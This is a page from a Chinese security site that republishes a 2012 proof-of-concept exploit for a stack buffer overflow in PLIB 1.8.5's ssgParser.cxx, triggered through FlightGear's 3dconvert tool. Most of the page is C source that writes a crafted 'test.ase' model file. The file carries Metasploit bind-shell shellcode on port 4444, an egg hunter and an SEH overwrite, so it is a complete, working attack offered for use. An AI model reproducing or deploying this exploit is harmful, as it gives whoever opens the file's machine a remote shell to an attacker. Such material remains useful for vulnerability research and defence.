首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow
来源:vfocus.net 作者:Andrés 发布时间:2012-10-10  

/*
# Exploit Title: Plib + flightgear 3dconvert exploit
# Date: 08/10/2012
# Author: Andres Gomez
# Software Links:
# Plib: http://plib.sourceforge.net/
# flightgear: http://www.flightgear.org/
# 3dconvert: ftp://ftp.ihg.uni-duisburg.de/FlightGear/Win32/old/3dconvert-win32.zip
# Version: Plib 1.8.5
# Tested on: Windows XP Service Pack 3 Spanish
*/

/*

   Plib is prone to stack based Buffer overflow in the error function in ssg/ssgParser.cxx when it loads
   3d model files as X (Direct x), ASC, ASE, ATG, and OFF.

   This exploit uses flightgear's utility 3dconvert. It creates a corrupted ASE file "test.ase", just run:

   FlightGear\bin\Win32\3dconvert.exe test.ase test.obj

*/


#include <stdio.h>
#include <stdlib.h>

/*
   Shellcode: msfpayload windows/shell_bind_tcp LPORT=4444 R | ./msfencode -e x86/alpha_mixed C
*/

unsigned char shellcode[] =
"\x89\xe0\xdd\xc6\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x69\x6c\x5a\x48\x4f\x79\x33\x30\x75\x50"
"\x67\x70\x71\x70\x4b\x39\x78\x65\x45\x61\x4a\x72\x71\x74"
"\x6c\x4b\x76\x32\x44\x70\x4e\x6b\x73\x62\x46\x6c\x6e\x6b"
"\x36\x32\x66\x74\x4c\x4b\x50\x72\x47\x58\x36\x6f\x4c\x77"
"\x50\x4a\x54\x66\x35\x61\x79\x6f\x45\x61\x4b\x70\x6e\x4c"
"\x47\x4c\x31\x71\x33\x4c\x35\x52\x56\x4c\x31\x30\x6a\x61"
"\x58\x4f\x34\x4d\x45\x51\x79\x57\x4d\x32\x6c\x30\x32\x72"
"\x61\x47\x4e\x6b\x66\x32\x44\x50\x4e\x6b\x47\x32\x37\x4c"
"\x55\x51\x6e\x30\x6e\x6b\x61\x50\x32\x58\x6e\x65\x79\x50"
"\x34\x34\x73\x7a\x46\x61\x5a\x70\x46\x30\x6e\x6b\x72\x68"
"\x66\x78\x6c\x4b\x63\x68\x55\x70\x66\x61\x78\x53\x49\x73"
"\x75\x6c\x77\x39\x6c\x4b\x64\x74\x6c\x4b\x57\x71\x7a\x76"
"\x45\x61\x39\x6f\x76\x51\x6b\x70\x4e\x4c\x5a\x61\x68\x4f"
"\x64\x4d\x66\x61\x4a\x67\x45\x68\x39\x70\x70\x75\x5a\x54"
"\x43\x33\x51\x6d\x58\x78\x45\x6b\x71\x6d\x47\x54\x54\x35"
"\x7a\x42\x53\x68\x4e\x6b\x66\x38\x44\x64\x53\x31\x4e\x33"
"\x43\x56\x4c\x4b\x56\x6c\x32\x6b\x4e\x6b\x36\x38\x77\x6c"
"\x37\x71\x4a\x73\x6e\x6b\x66\x64\x4c\x4b\x46\x61\x78\x50"
"\x4c\x49\x50\x44\x36\x44\x71\x34\x63\x6b\x53\x6b\x33\x51"
"\x46\x39\x70\x5a\x70\x51\x49\x6f\x49\x70\x32\x78\x61\x4f"
"\x70\x5a\x6c\x4b\x67\x62\x6a\x4b\x4d\x56\x43\x6d\x52\x48"
"\x67\x43\x46\x52\x47\x70\x43\x30\x65\x38\x50\x77\x54\x33"
"\x45\x62\x31\x4f\x71\x44\x65\x38\x62\x6c\x53\x47\x34\x66"
"\x53\x37\x39\x6f\x7a\x75\x6d\x68\x4a\x30\x35\x51\x53\x30"
"\x45\x50\x76\x49\x78\x44\x46\x34\x56\x30\x72\x48\x56\x49"
"\x4b\x30\x62\x4b\x43\x30\x39\x6f\x48\x55\x42\x70\x50\x50"
"\x76\x30\x52\x70\x73\x70\x70\x50\x51\x50\x62\x70\x75\x38"
"\x39\x7a\x36\x6f\x6b\x6f\x39\x70\x69\x6f\x48\x55\x6e\x69"
"\x58\x47\x35\x61\x79\x4b\x66\x33\x30\x68\x56\x62\x73\x30"
"\x37\x61\x63\x6c\x6c\x49\x6a\x46\x62\x4a\x64\x50\x73\x66"
"\x72\x77\x51\x78\x6a\x62\x49\x4b\x46\x57\x42\x47\x4b\x4f"
"\x39\x45\x73\x63\x61\x47\x35\x38\x58\x37\x69\x79\x30\x38"
"\x59\x6f\x69\x6f\x4a\x75\x61\x43\x31\x43\x53\x67\x30\x68"
"\x62\x54\x68\x6c\x65\x6b\x69\x71\x59\x6f\x68\x55\x56\x37"
"\x4d\x59\x7a\x67\x53\x58\x71\x65\x72\x4e\x42\x6d\x45\x31"
"\x6b\x4f\x68\x55\x43\x58\x53\x53\x42\x4d\x35\x34\x77\x70"
"\x4c\x49\x69\x73\x42\x77\x42\x77\x70\x57\x46\x51\x49\x66"
"\x30\x6a\x64\x52\x56\x39\x66\x36\x68\x62\x69\x6d\x75\x36"
"\x78\x47\x67\x34\x61\x34\x57\x4c\x67\x71\x47\x71\x4e\x6d"
"\x63\x74\x54\x64\x36\x70\x48\x46\x53\x30\x42\x64\x72\x74"
"\x46\x30\x46\x36\x76\x36\x42\x76\x53\x76\x63\x66\x42\x6e"
"\x72\x76\x53\x66\x56\x33\x62\x76\x51\x78\x42\x59\x68\x4c"
"\x75\x6f\x6b\x36\x49\x6f\x48\x55\x4d\x59\x4b\x50\x32\x6e"
"\x36\x36\x61\x56\x49\x6f\x76\x50\x53\x58\x43\x38\x6f\x77"
"\x57\x6d\x35\x30\x6b\x4f\x4b\x65\x6d\x6b\x58\x70\x78\x35"
"\x4e\x42\x72\x76\x63\x58\x6f\x56\x4c\x55\x6d\x6d\x6d\x4d"
"\x6b\x4f\x39\x45\x55\x6c\x37\x76\x61\x6c\x45\x5a\x4b\x30"
"\x6b\x4b\x69\x70\x54\x35\x77\x75\x4f\x4b\x77\x37\x52\x33"
"\x52\x52\x32\x4f\x51\x7a\x77\x70\x30\x53\x59\x6f\x6a\x75"
"\x41\x41";

unsigned char egg_hunter [] =
"\xdb\xd9\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4a\x49\x43\x56\x4e\x61\x6a\x6a\x4b\x4f\x54\x4f\x51"
"\x52\x76\x32\x42\x4a\x33\x73\x51\x48\x68\x4d\x56\x4e\x75"
"\x6c\x66\x65\x30\x5a\x71\x64\x78\x6f\x4e\x58\x5a\x30\x52"
"\x70\x6a\x30\x30\x50\x6c\x4b\x79\x6a\x6e\x4f\x34\x35\x7a"
"\x4a\x4c\x6f\x62\x55\x6d\x37\x49\x6f\x6a\x47\x41\x41";

unsigned char egg [] = "\x90\x50\x90\x50\x90\x50\x90\x50";
unsigned char seh_pointer [] = "\x49\x19\xE1\x08"; // seh pointer pop pop ret;
unsigned char short_jump [] = "\xEB\x0C\x41\x41"; // short jump;

int main(int argc, char **argv) {

    FILE *save_fd;
    int i=0;

    save_fd = fopen("test.ase", "w+");

    if (save_fd == NULL) {
     printf("Failed to open '%s' for writing", "test.ase");
     return -1;
    }

    fprintf(save_fd,    "*3DSMAX_ASCIIEXPORT 200\n"
   "*COMMENT \"created by SSG.\"\n"
   "*SCENE {\n"
   "  *SCENE_FILENAME \"\"\n"
   "  *SCENE_FIRSTFRAME 0\n"
   "  *SCENE_LASTFRAME 100\n"
   "  *SCENE_FRAMESPEED 30\n"
   "  *SCENE_TICKSPERFRAME 160\n"
   "  *SCENE_BACKGROUND_STATIC 0.0000 0.0000 0.0000\n"
   "  *SCENE_AMBIENT_STATIC 0.0431 0.0431 0.0431\n"
   "}\n"
   "*MATERIAL_LIST {\n"
   "  *MATERIAL_COUNT 2\n"
   "  *MATERIAL 0 {\n"
   "    *MATERIAL_NAME \"Material #0\"\n"
   "    *MATERIAL_CLASS \"Standard\"\n"
   "    *MATERIAL_AMBIENT 1.000000 1.000000 1.000000\n"
   "    *MATERIAL_DIFFUSE 1.000000 1.000000 1.000000\n"
   "    *MATERIAL_SPECULAR 0.502000 0.502000 0.502000\n"
   "    *MATERIAL_SHINE 50.000000\n"
   "    *MATERIAL_SHINESTRENGTH 50.000000\n"
   "    *MATERIAL_TRANSPARENCY 0.000000\n"
   "    *MATERIAL_WIRESIZE 1.0000\n"
   "    *MATERIAL_SHADING Blinn\n"
   "    *MATERIAL_XP_FALLOFF 0.0000\n"
   "    *MATERIAL_SELFILLUM 0.0000\n"
   "    *MATERIAL_TWOSIDED\n"
   "    *MATERIAL_FALLOFF In\n"
   "    *MATERIAL_SOFTEN\n"
   "    *MATERIAL_XP_TYPE Filter\n"
   " *SUBMATERIAL ");
    for(i=0; i < 573; i++) {
     putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", short_jump);
    fprintf(save_fd, "%s", seh_pointer);
    for(i=0; i < 0x0F; i++) {
     putc('\x90', save_fd);
    }

    fprintf(save_fd, "%s", egg_hunter);
    for(i=0; i < 573; i++) {
     putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", egg);
    fprintf(save_fd, "%s", shellcode);
   
    fprintf(save_fd, " {\n");
   
    close(save_fd);

    return 0;
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Avaya IP Office Customer Call
·Gom Player 2.1.44.5123 (Unicod
·Avaya WinPMD UniteHostRouter B
·FL Studio 10 Producer Edition
·Hiro Player 1.6.0 (.mp3) Local
·Arctic Torrent 1.2.3 Memory Co
·Microsoft IIS 5.0/6.0 FTP Serv
·Apple iOS Default SSH Password
·Dart Communications Stack Over
·Windows Escalate UAC Execute R
·Microsoft Office Excel 2003 St
·Oracle Business Transaction Ma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved